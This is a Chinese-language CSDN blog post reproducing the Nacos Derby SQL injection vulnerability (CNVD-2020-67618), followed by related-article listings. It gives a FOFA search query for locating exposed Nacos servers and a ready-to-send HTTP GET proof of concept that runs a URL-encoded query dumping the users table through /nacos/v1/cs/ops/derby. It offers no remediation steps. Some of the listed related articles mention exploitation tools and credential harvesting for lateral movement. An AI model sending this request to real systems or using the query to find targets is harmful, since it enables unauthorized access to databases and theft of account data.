【漏洞复现】Nacos Derby SQL注入漏洞

于 2024-04-28 09:45:38 发布
阅读量196 收藏 2
点赞数 1
分类专栏: 【漏洞复现】 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_37113223/article/details/138268522
版权

漏洞描述:

Nacos Derby SQL注入漏洞(CNVD-2020-67618)是一个重要的安全问题,它涉及到Nacos中使用的Derby数据库存在的SQL注入风险。SQL注入是一种攻击手段,攻击者通过在应用程序的输入字段中插入恶意的SQL代码,从而能够执行未经授权的数据库操作,获取敏感信息,甚至篡改数据。

搜索语法:

Fofa-Query: ip.port=="8848" and title=="HTTP Status 404 – Not Found"

漏洞详情:

1.Nacos服务系统。

2.漏洞POC:

GET /nacos/v1/cs/ops/derby?sql=%73%65%6c%65%63%74%20%2a%20%66%72%6f%6d%20%75%73%65%72%73 HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close
Accept-Encoding: gzip

3.漏洞复现结果。

晚风不及你ღ
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
订阅专栏
nacos2.0.2版本依赖数据库sql脚本
07-17
nacos2.0.2版本依赖数据库sql脚本
sql注入漏洞详解
qq_39511050的博客
09-17 968
sql注入漏洞详解
修复nacos漏洞问题SQL注入CNVD-2020-67618、未授权访问CVE-2021-29441等
kaopuzong的博客
02-06 919
修复nacos漏洞问题:漏洞1:SQL注入CNVD-2020-67618 漏洞2:未授权访问CVE-2021-29441 漏洞3:token.secret.key默认配置QVD-2023-6271 漏洞4:Jraft Hessian反序列化CNVD-2023-45001
nacos漏洞检测工具-NacosExploitGUI
最新发布
u013008898的博客
02-18 540
GitHub - charonlight/NacosExploitGUI: Nacos漏洞综合利用GUI工具,集成了默认口令漏洞SQL注入漏洞、身份认证绕过漏洞、反序列化漏洞的检测及其利用
渗透测试--Nacos系统
qq_53003652的博客
11-25 2236
nacos是指,阿里为 SpringCloud 贡献了一个子项目,叫做 SpringCloud Alibaba,其中包括了微服务开发中的几个基础组件,Nacos 就是此项目中的一项技术。可以实现服务注册中心、分布式配置中心。针对微服务架构中的服务发现、配置管理、服务治理的综合型解决方案。Nacos在攻防实战中也是经常遇到,大多数布置是在内网,但是公网上也是有不少的,因为其存在多个漏洞,师傅们也是通过nacos拿下了不少分数。
SQL注入漏洞修复方案及代码审计
fengxioabai的博客
03-18 1014
⼀个成功的SQL注⼊攻击可以从 数据库中获取敏感 数据、修改数据库数据(插⼊/更新/删除)、执⾏数据库管理操作 (如关闭数据库管理系统)、恢 复存在于数据库⽂件系统中的指定⽂件 内容,在某些情况下能对操作系统发布命令。由于⽤户的输⼊,也是SQL语句的⼀部分,所以 攻击者可以利⽤这部分可以控制的内容,注⼊⾃⼰定义的语句,改变SQL语句 执⾏逻辑,让数据库执⾏任意⾃⼰需要 的指令。通过控制部分SQL语句,攻击者可以查询数据库中任何⾃⼰需要的数据,利⽤数据库的⼀ 些特性,可以直接 获取数据库服务器的系统权限。
nacos食用手册
qq_42866492的博客
10-07 3216
##github上地址:nacos官方文档 ##一、启动nacos服务器-- windown10 ###1、第一个异常:db.num is null (1)打开 带的sql 注入本地 mysql (2)配置 application.properties ###2、第二个异常:Unable to start embedded Tomcat (3)配置 startup.cmd,改为单机模式,standalone ###3、启动 ##二、nacos 服务注册/发现 ###1、先统一定义版本号 &
Nacos2.2.2增加鉴权配置,防止NACOS身份登陆绕过漏洞
06-04
Nacos /nɑ:kəʊs/ 是 Dynamic Naming and Configuration Service的首字母简称,一个更易于构建云原生应用的动态服务发现、配置管理和服务管理平台。 Nacos 致力于帮助您发现、配置和管理微服务。Nacos 提供了一组...
nacos-mysql.sql
02-05
nacos默认使用嵌入式数据库实现数据的存储,若想使用外部mysql存储nacos数据,需进行文件配置,此文件为生成nacos的数据库表的脚本。
nacos脚本.sql
07-01
nacos配置mysql永久缓存的数据库脚本
Alibaba Nacos权限认证绕过漏洞复现
逍遥小哥的博客
07-18 5441
是一个易于使用的平台,旨在用于动态服务发现,配置和服务管理。它可以帮助您轻松构建云本机应用程序和。2020年12月29日,Nacos官方在github发布的issue中披露Alibaba Nacos 存在一个由于不当处理User-Agent导致的未授权访问漏洞。通过该漏洞,攻击者可以进行任意操作,包括创建新用户并进行登录后操作。为什么会产生这个漏洞?1.认证授权操作时,会判断请求的user-agent是否为”Nacos-Server”,如果是的话则不进行任何认证。
nacos外置数据库的配置与使用
weixin_36332085的博客
06-02 1595
nacos外置数据库的配置与使用 第一步:下载nacos安装文件并解压 说明:解压文件中的目录:bin是启动目录;conf是配置目录 第二步:将配置目录conf下的nacos-mysql.sql文件在数据库中执行 第三步:修改配置文件中的相关参数 将红色部分的文件打开编辑 输入自己数据的库名,账号,密码;将红色部分的#取消掉 第四:注意 在本地为单机环境下需要将启动文件中的集群模式改为单机模式,具体是改为红色框中的“standalone” 第五步:手动启动 ...
网络安全基础技术扫盲篇 — 常见web漏洞SQL注入
资深程序员,曾自学JAVA,C#,如今从业于网安行业
02-01 475
如果你也想学习:黑客&网络安全的SQL攻防知识宝库在此藏,一键关注获宝藏是一种Web应用程序中的安全漏洞,它允许攻击者通过在用户输入中插入恶意的SQL代码,来执行非授权的数据库操作。具体来说,当应用程序将用户输入的数据直接拼接到SQL查询语句中而没有充分验证或转义时,攻击者可以利用这个漏洞来修改原本的查询意图,甚至获取、修改或删除数据库中的数据。SQL注入攻击的原理是用户输入的数据被当成SQL代码执行。
NACOS漏洞深入解析(审计+复现
qq_49849300的博客
03-27 4646
目前攻防对抗实战中,Nacos的环境遇到非常多,并且无一例外都没有开启auth,很多防守方甚至只是用防火墙阻断网上公开的那几条exp利用的关键地址,Nacos里面保存了企业很多的配置文件比如数据库连接信息、AK/SK信息等等,拿到账号密码等信息之后用来做密码本,然后再进行内网横向,杀伤力非常之大。看一下/config/src/main/java/com/alibaba/nacos/config/server/controller/ConfigController.java文件中369行开始的代码。
nacos服务注册中心
weixin_59095717的博客
12-01 164
spring cloud 入门学习
Nacos漏洞总结复现
热门推荐
渗透测试研究中心
03-23 1万+
Nacos漏洞总结复现一、Nacos默认key导致权限绕过登陆0x00 漏洞描述Nacos中发现影响Nacos <= 2.1.0的问题,Nacos用户使用默认JWT密钥导致未授权访问漏洞。 通过该漏洞,攻击者可以绕过用户名密码认证,直接登录Nacos用户0x01漏洞影响0.1.0 <= Nacos <= 2.2.00x02 漏洞搜索fofa:app="NACOS"0x03 ...
Nacos
while(life)++;
12-02 2394
服务发现、服务配置、服务管理平台注册中心、配置中心、服务管理继承,不用注解//获得当前请求的服务实例 List < Server > reachableServers = loadBalancer . getReachableServers();//随机获取一个数 int random = ThreadLocalRandom . current() . nextInt(reachableServers . size());
nacos数据库sql
08-31
Nacos数据库的SQL语句可以通过修改NACOS_PATH/conf/application.properties文件中的配置来实现。具体步骤如下: 1. 打开NACOS_PATH/conf/application.properties文件。 2. 增加mysql的配置,包括数据库连接URL、用户名和密码。示例如下: ``` spring.datasource.platform=mysql db.num=1 db.url.0=jdbc:mysql://localhost:3306/nacos_config db.user=root db.password=root ``` 这里的数据库连接URL是jdbc:mysql://localhost:3306/nacos_config,用户名是root,密码是root。 3. 保存并关闭application.properties文件。 通过以上步骤,你可以将Nacos的数据库配置改为使用mysql数据库。注意,这个修改只适用于集群模式下的Nacos,因为在standalone模式下,默认使用的是Derby数据库来存储配置信息。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [Nacos服务端配置数据Mqsql存储](https://blog.csdn.net/xingxinggua9620/article/details/113564839)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值